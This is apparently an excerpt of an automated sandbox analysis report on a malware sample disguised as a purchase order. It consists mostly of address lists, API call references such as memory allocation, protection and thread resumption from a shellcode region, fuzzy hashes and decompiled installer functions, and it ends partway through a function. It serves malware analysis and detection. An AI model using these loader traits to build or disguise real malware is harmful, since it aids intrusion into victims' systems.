                                                                                      0x00406d07
                                                                                      0x00406cd6
                                                                                      0x00406cd9
                                                                                      0x00406cde
                                                                                      0x00406cde
                                                                                      0x00406ce9
                                                                                      0x00406cf1
                                                                                      0x00406cf4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d39
                                                                                      0x00406d3f
                                                                                      0x00406d42
                                                                                      0x00406d4f
                                                                                      0x00406d57
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d0e
                                                                                      0x00406d0e
                                                                                      0x00406d12
                                                                                      0x0040755d
                                                                                      0x00000000
                                                                                      0x0040755d
                                                                                      0x00406d1e
                                                                                      0x00406d29
                                                                                      0x00406d29
                                                                                      0x00406d29
                                                                                      0x00406d2c
                                                                                      0x00406d2f
                                                                                      0x00406d32
                                                                                      0x00406d37
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ffe
                                                                                      0x00407002
                                                                                      0x00407020
                                                                                      0x00407023
                                                                                      0x0040702a
                                                                                      0x0040702d
                                                                                      0x00407030
                                                                                      0x00407033
                                                                                      0x00407036
                                                                                      0x00407039
                                                                                      0x0040703b
                                                                                      0x00407042
                                                                                      0x00407043
                                                                                      0x00407045
                                                                                      0x00407048
                                                                                      0x0040704b
                                                                                      0x0040704e
                                                                                      0x0040704e
                                                                                      0x00407053
                                                                                      0x00000000
                                                                                      0x00407053
                                                                                      0x00407004
                                                                                      0x00407007
                                                                                      0x0040700a
                                                                                      0x00407014
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407068
                                                                                      0x0040706c
                                                                                      0x0040708f
                                                                                      0x00407092
                                                                                      0x00407095
                                                                                      0x0040709f
                                                                                      0x0040706e
                                                                                      0x0040706e
                                                                                      0x00407071
                                                                                      0x00407074
                                                                                      0x00407077
                                                                                      0x00407084
                                                                                      0x00407087
                                                                                      0x00407087
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070ab
                                                                                      0x004070af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070b5
                                                                                      0x004070b9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070bf
                                                                                      0x004070c1
                                                                                      0x004070c5
                                                                                      0x004070c5
                                                                                      0x004070c8
                                                                                      0x004070cc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040711c
                                                                                      0x00407120
                                                                                      0x00407127
                                                                                      0x0040712a
                                                                                      0x0040712d
                                                                                      0x00407137
                                                                                      0x00000000
                                                                                      0x00407137
                                                                                      0x00407122
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407143
                                                                                      0x00407147
                                                                                      0x0040714e
                                                                                      0x00407151
                                                                                      0x00407154
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x00407157
                                                                                      0x0040715a
                                                                                      0x0040715d
                                                                                      0x0040715d
                                                                                      0x00407160
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407170
                                                                                      0x00407175
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407203
                                                                                      0x00407203
                                                                                      0x00407207
                                                                                      0x004075a5
                                                                                      0x00000000
                                                                                      0x004075a5
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x00407217
                                                                                      0x0040721a
                                                                                      0x00407220
                                                                                      0x00407222
                                                                                      0x00407222
                                                                                      0x00407222
                                                                                      0x00407225
                                                                                      0x00407228
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407286
                                                                                      0x00407286
                                                                                      0x0040728a
                                                                                      0x004075b1
                                                                                      0x00000000
                                                                                      0x004075b1
                                                                                      0x00407290
                                                                                      0x00407293
                                                                                      0x00407296
                                                                                      0x0040729a
                                                                                      0x0040729d
                                                                                      0x004072a3
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407056
                                                                                      0x00407056
                                                                                      0x00407059
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407395
                                                                                      0x00407399
                                                                                      0x004073bb
                                                                                      0x004073be
                                                                                      0x004073c8
                                                                                      0x00000000
                                                                                      0x004073c8
                                                                                      0x0040739b
                                                                                      0x0040739e
                                                                                      0x004073a2
                                                                                      0x004073a5
                                                                                      0x004073a5
                                                                                      0x004073a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407452
                                                                                      0x00407456
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x0040747b
                                                                                      0x00407482
                                                                                      0x00407489
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00407458
                                                                                      0x0040745b
                                                                                      0x0040745e
                                                                                      0x00407461
                                                                                      0x00407468
                                                                                      0x004073ac
                                                                                      0x004073ac
                                                                                      0x004073af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407543
                                                                                      0x00407546
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040717d
                                                                                      0x0040717f
                                                                                      0x00407186
                                                                                      0x00407187
                                                                                      0x00407189
                                                                                      0x0040718c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407194
                                                                                      0x00407197
                                                                                      0x0040719a
                                                                                      0x0040719c
                                                                                      0x0040719e
                                                                                      0x0040719e
                                                                                      0x0040719f
                                                                                      0x004071a2
                                                                                      0x004071a9
                                                                                      0x004071ac
                                                                                      0x004071ba
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407490
                                                                                      0x00407490
                                                                                      0x00407493
                                                                                      0x0040749a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040749f
                                                                                      0x0040749f
                                                                                      0x004074a3
                                                                                      0x004075db
                                                                                      0x00000000
                                                                                      0x004075db
                                                                                      0x004074a9
                                                                                      0x004074ac
                                                                                      0x004074af
                                                                                      0x004074b3
                                                                                      0x004074b6
                                                                                      0x004074bc
                                                                                      0x004074be
                                                                                      0x004074be
                                                                                      0x004074be
                                                                                      0x004074c1
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c7
                                                                                      0x004074c7
                                                                                      0x004074cb
                                                                                      0x0040752b
                                                                                      0x0040752e
                                                                                      0x00407533
                                                                                      0x00407534
                                                                                      0x00407536
                                                                                      0x00407538
                                                                                      0x0040753b
                                                                                      0x00000000
                                                                                      0x0040753b
                                                                                      0x004074cd
                                                                                      0x004074d3
                                                                                      0x004074d6
                                                                                      0x004074d9
                                                                                      0x004074dc
                                                                                      0x004074df
                                                                                      0x004074e2
                                                                                      0x004074e5
                                                                                      0x004074e8
                                                                                      0x004074eb
                                                                                      0x004074ee
                                                                                      0x00407507
                                                                                      0x0040750a
                                                                                      0x0040750d
                                                                                      0x00407510
                                                                                      0x00407514
                                                                                      0x00407516
                                                                                      0x00407516
                                                                                      0x00407517
                                                                                      0x0040751a
                                                                                      0x004074f0
                                                                                      0x004074f0
                                                                                      0x004074f8
                                                                                      0x004074fd
                                                                                      0x004074ff
                                                                                      0x00407502
                                                                                      0x00407502
                                                                                      0x0040751d
                                                                                      0x00407524
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00000000
                                                                                      0x004071c2
                                                                                      0x004071c5
                                                                                      0x004071fb
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732e
                                                                                      0x0040732e
                                                                                      0x00407331
                                                                                      0x00407333
                                                                                      0x004075bd
                                                                                      0x00000000
                                                                                      0x004075bd
                                                                                      0x00407339
                                                                                      0x0040733c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407342
                                                                                      0x00407346
                                                                                      0x00407349
                                                                                      0x00407349
                                                                                      0x00407349
                                                                                      0x00000000
                                                                                      0x00407349
                                                                                      0x004071c7
                                                                                      0x004071c9
                                                                                      0x004071cb
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d1
                                                                                      0x004071d3
                                                                                      0x004071d5
                                                                                      0x004071d8
                                                                                      0x004071db
                                                                                      0x004071f1
                                                                                      0x004071f6
                                                                                      0x0040722e
                                                                                      0x0040722e
                                                                                      0x00407232
                                                                                      0x0040725e
                                                                                      0x00407260
                                                                                      0x00407267
                                                                                      0x0040726a
                                                                                      0x0040726d
                                                                                      0x0040726d
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407274
                                                                                      0x00407277
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x004072ae
                                                                                      0x004072ae
                                                                                      0x004072b1
                                                                                      0x004072b4
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00000000
                                                                                      0x00407328
                                                                                      0x004072b6
                                                                                      0x004072bc
                                                                                      0x004072bf
                                                                                      0x004072c2
                                                                                      0x004072c5
                                                                                      0x004072c8
                                                                                      0x004072cb
                                                                                      0x004072ce
                                                                                      0x004072d1
                                                                                      0x004072d4
                                                                                      0x004072d7
                                                                                      0x004072f0
                                                                                      0x004072f2
                                                                                      0x004072f5
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072fb
                                                                                      0x004072fe
                                                                                      0x00407300
                                                                                      0x00407302
                                                                                      0x00407305
                                                                                      0x00407307
                                                                                      0x0040730a
                                                                                      0x0040730e
                                                                                      0x00407310
                                                                                      0x00407310
                                                                                      0x00407311
                                                                                      0x00407314
                                                                                      0x00407317
                                                                                      0x004072d9
                                                                                      0x004072d9
                                                                                      0x004072e1
                                                                                      0x004072e6
                                                                                      0x004072e8
                                                                                      0x004072eb
                                                                                      0x004072eb
                                                                                      0x0040731a
                                                                                      0x00407321
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00407321
                                                                                      0x00407234
                                                                                      0x00407237
                                                                                      0x00407239
                                                                                      0x0040723c
                                                                                      0x0040723f
                                                                                      0x00407242
                                                                                      0x00407244
                                                                                      0x00407247
                                                                                      0x0040724a
                                                                                      0x0040724a
                                                                                      0x0040724d
                                                                                      0x0040724d
                                                                                      0x00407250
                                                                                      0x00407257
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00407257
                                                                                      0x004071dd
                                                                                      0x004071e0
                                                                                      0x004071e2
                                                                                      0x004071e5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070cf
                                                                                      0x004070cf
                                                                                      0x004070d3
                                                                                      0x00407599
                                                                                      0x00000000
                                                                                      0x00407599
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070df
                                                                                      0x004070e2
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e7
                                                                                      0x004070ea
                                                                                      0x004070ed
                                                                                      0x004070f0
                                                                                      0x004070f3
                                                                                      0x004070f6
                                                                                      0x004070f7
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070fc
                                                                                      0x004070ff
                                                                                      0x00407102
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407108
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x00407350
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407356
                                                                                      0x00407359
                                                                                      0x0040735c
                                                                                      0x0040735f
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407364
                                                                                      0x00407367
                                                                                      0x0040736a
                                                                                      0x0040736d
                                                                                      0x00407370
                                                                                      0x00407373
                                                                                      0x00407374
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407379
                                                                                      0x0040737c
                                                                                      0x0040737f
                                                                                      0x00407382
                                                                                      0x00407385
                                                                                      0x00407389
                                                                                      0x0040738b
                                                                                      0x0040738e
                                                                                      0x00000000
                                                                                      0x00407390
                                                                                      0x00000000
                                                                                      0x00407390
                                                                                      0x0040738e
                                                                                      0x004075c3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bf2

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                      • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                      • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                      • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(00009176,?,?), ref: 03C81739
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: Xa;m
                                                                                      • API String ID: 1029625771-1767484315
                                                                                      • Opcode ID: a6e5bb27782f35d1bc5ae3a36801abd6c474ee971513829173b3e4cc1d4c1466
                                                                                      • Instruction ID: 5a6f6920471fbed9366b1ae9d23d04d837cab59e9b0524875bf9b05e46a2f652
                                                                                      • Opcode Fuzzy Hash: a6e5bb27782f35d1bc5ae3a36801abd6c474ee971513829173b3e4cc1d4c1466
                                                                                      • Instruction Fuzzy Hash: 4751347460435ADFCF30EF69CD90BDE3AA6AF89750F5A823E9C49DB244C7348A428741
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 03C81659: LoadLibraryA.KERNELBASE(00009176,?,?), ref: 03C81739
                                                                                      • NtAllocateVirtualMemory.NTDLL(1714653B,?,A878B800), ref: 03C825CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                      • String ID: ],tH
                                                                                      • API String ID: 2616484454-438354615
                                                                                      • Opcode ID: d0a5faf440010c58766970ca28239d38768214f9432c9e50abb908956390e4ec
                                                                                      • Instruction ID: 6263672408160bbf8e4ca24d17c039a95af70c6ae82fbb96adeba73d781542de
                                                                                      • Opcode Fuzzy Hash: d0a5faf440010c58766970ca28239d38768214f9432c9e50abb908956390e4ec
                                                                                      • Instruction Fuzzy Hash: D75188326053499BDF38EF658CA87DF36E6AF55354F12452EDC4AEB250D7308A818B42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(?,C079D953), ref: 03C80ED8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID: <1
                                                                                      • API String ID: 823142352-2110216127
                                                                                      • Opcode ID: 38f2789950187d87ba946b85732a64b1e0e27aff8dc23b5e27a8bca3772054dd
                                                                                      • Instruction ID: 929618e0bb304d595afa3fd6311ac6f5d550dccee4359ab101cb07d212dd262a
                                                                                      • Opcode Fuzzy Hash: 38f2789950187d87ba946b85732a64b1e0e27aff8dc23b5e27a8bca3772054dd
                                                                                      • Instruction Fuzzy Hash: 63213671608356EFDB64EF368D617FB73A2AF40348F81442F9D8AC7250D7305A498603
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040699E(WCHAR* _a4) {
                                                                                      				void* _t2;
                                                                                      
                                                                                      				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                                                      				if(_t2 == 0xffffffff) {
                                                                                      					return 0;
                                                                                      				}
                                                                                      				FindClose(_t2);
                                                                                      				return 0x426798;
                                                                                      			}




                                                                                      0x004069a9
                                                                                      0x004069b2
                                                                                      0x00000000
                                                                                      0x004069bf
                                                                                      0x004069b5
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50, 4pu.pu,?,75702EE0,00405D94,?,75703420,75702EE0), ref: 004069A9
                                                                                      • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                      • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                      • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                      • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(00009176,?,?), ref: 03C81739
                                                                                        • Part of subcall function 03C842AE: NtProtectVirtualMemory.NTDLL ref: 03C84372
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoadMemoryProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3389902171-0
                                                                                      • Opcode ID: 4f96557b51023ea26a3a854a61819adab2cf1a14c50ec08e435af147a9c05d4f
                                                                                      • Instruction ID: 239136f17698f25ff92482691c7aa6dc536a95ab50089206bb815302473c195e
                                                                                      • Opcode Fuzzy Hash: 4f96557b51023ea26a3a854a61819adab2cf1a14c50ec08e435af147a9c05d4f
                                                                                      • Instruction Fuzzy Hash: E2F118785083C68FDB31DF38C8987DA7BA1AF16364F4982AACC99CF196D7348645C712
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6a39c7b2544e504543bd06ca141dbc9638eb2ca8c2e30220a6dcc0f7a00474ed
                                                                                      • Instruction ID: 4c7125f509f83ea04a6f4f95a25183f3fca97a662ac6c61ca00462e7b4ced398
                                                                                      • Opcode Fuzzy Hash: 6a39c7b2544e504543bd06ca141dbc9638eb2ca8c2e30220a6dcc0f7a00474ed
                                                                                      • Instruction Fuzzy Hash: 5F51DAB56013029FDB24EF29C8C87EE7BA6EF563A8F59806ADC41CF151C7748681CB01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(00009176,?,?), ref: 03C81739
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 70f1a95d331660d4aa5d34c819ccfe62f380aa9a97687a2e82473348883c448c
                                                                                      • Instruction ID: 03edfb052fc2008b2e8d71f06ff0978fb02a71a832297dbfea2e56d2f0f3c024
                                                                                      • Opcode Fuzzy Hash: 70f1a95d331660d4aa5d34c819ccfe62f380aa9a97687a2e82473348883c448c
                                                                                      • Instruction Fuzzy Hash: 16412475A4135A9FEF30EF288D947EE369BAF5A750F46403BDC49EB200C7714A418780
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtProtectVirtualMemory.NTDLL ref: 03C84372
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MemoryProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2706961497-0
                                                                                      • Opcode ID: c7468ab19038d685ab98084b8aaebb470173df8df252a7a30eaf7ca5d0e2f678
                                                                                      • Instruction ID: a5feab67a223b1a9f81897b07573ba03461e8f6e407bcdbd399006969f8a34c7
                                                                                      • Opcode Fuzzy Hash: c7468ab19038d685ab98084b8aaebb470173df8df252a7a30eaf7ca5d0e2f678
                                                                                      • Instruction Fuzzy Hash: 9B11B2B57046449FDB68DE2D8D846EB76A6AFD5300F04812EAC4ADB308C6308A448A11
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtResumeThread.NTDLL(00000001,03C84F95,-CB05FB01,03C7FD31,00000000,03C72A24), ref: 03C84AB7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: 64433da91010b31b691b5cf5f394dee732e185397297a0b2a71b253523a0f355
                                                                                      • Instruction ID: 1c0921b731953df51f288b234adf554e024ec677679c66fe1e8852059c6b203c
                                                                                      • Opcode Fuzzy Hash: 64433da91010b31b691b5cf5f394dee732e185397297a0b2a71b253523a0f355
                                                                                      • Instruction Fuzzy Hash: 1B01BC3160864BCECB3CFF2B8A953E967A6AF8934CF15462ACD07CF640E7359B058601
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 194 4040c5-4040d7 195 4040dd-4040e3 194->195 196 40423e-40424d 194->196 195->196 197 4040e9-4040f2 195->197 198 40429c-4042b1 196->198 199 40424f-404297 GetDlgItem * 2 call 4045c4 SetClassLongW call 40140b 196->199 200 4040f4-404101 SetWindowPos 197->200 201 404107-40410e 197->201 203 4042f1-4042f6 call 404610 198->203 204 4042b3-4042b6 198->204 199->198 200->201 206 404110-40412a ShowWindow 201->206 207 404152-404158 201->207 213 4042fb-404316 203->213 209 4042b8-4042c3 call 401389 204->209 210 4042e9-4042eb 204->210 214 404130-404143 GetWindowLongW 206->214 215 40422b-404239 call 40462b 206->215 216 404171-404174 207->216 217 40415a-40416c DestroyWindow 207->217 209->210 229 4042c5-4042e4 SendMessageW 209->229 210->203 212 404591 210->212 224 404593-40459a 212->224 221 404318-40431a call 40140b 213->221 222 40431f-404325 213->222 214->215 223 404149-40414c ShowWindow 214->223 215->224 227 404176-404182 SetWindowLongW 216->227 228 404187-40418d 216->228 225 40456e-404574 217->225 221->222 233 40432b-404336 222->233 234 40454f-404568 DestroyWindow EndDialog 222->234 223->207 225->212 232 404576-40457c 225->232 227->224 228->215 235 404193-4041a2 GetDlgItem 228->235 229->224 232->212 238 40457e-404587 ShowWindow 232->238 233->234 239 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 233->239 234->225 236 4041c1-4041c4 235->236 237 4041a4-4041bb SendMessageW IsWindowEnabled 235->237 240 4041c6-4041c7 236->240 241 4041c9-4041cc 236->241 237->212 237->236 238->212 266 404393-4043cf ShowWindow KiUserCallbackDispatcher call 4045e6 EnableWindow 239->266 267 40438b-404390 239->267 243 4041f7-4041fc call 40459d 240->243 244 4041da-4041df 241->244 245 4041ce-4041d4 241->245 243->215 247 404215-404225 SendMessageW 244->247 249 4041e1-4041e7 244->249 245->247 248 4041d6-4041d8 245->248 247->215 248->243 252 4041e9-4041ef call 40140b 249->252 253 4041fe-404207 call 40140b 249->253 264 4041f5 252->264 253->215 262 404209-404213 253->262 262->264 264->243 270 4043d1-4043d2 266->270 271 4043d4 266->271 267->266 272 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 404406-404417 SendMessageW 272->273 274 404419 272->274 275 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 273->275 274->275 275->213 286 404464-404466 275->286 286->213 287 40446c-404470 286->287 288 404472-404478 287->288 289 40448f-4044a3 DestroyWindow 287->289 288->212 290 40447e-404484 288->290 289->225 291 4044a9-4044d6 CreateDialogParamW 289->291 290->213 292 40448a 290->292 291->225 293 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->212 293->212 298 404535-404548 ShowWindow call 404610 293->298 300 40454d 298->300 300->225
                                                                                      C-Code - Quality: 86%
                                                                                      			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                                      				struct HWND__* _v28;
                                                                                      				void* _v80;
                                                                                      				void* _v84;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t34;
                                                                                      				signed int _t36;
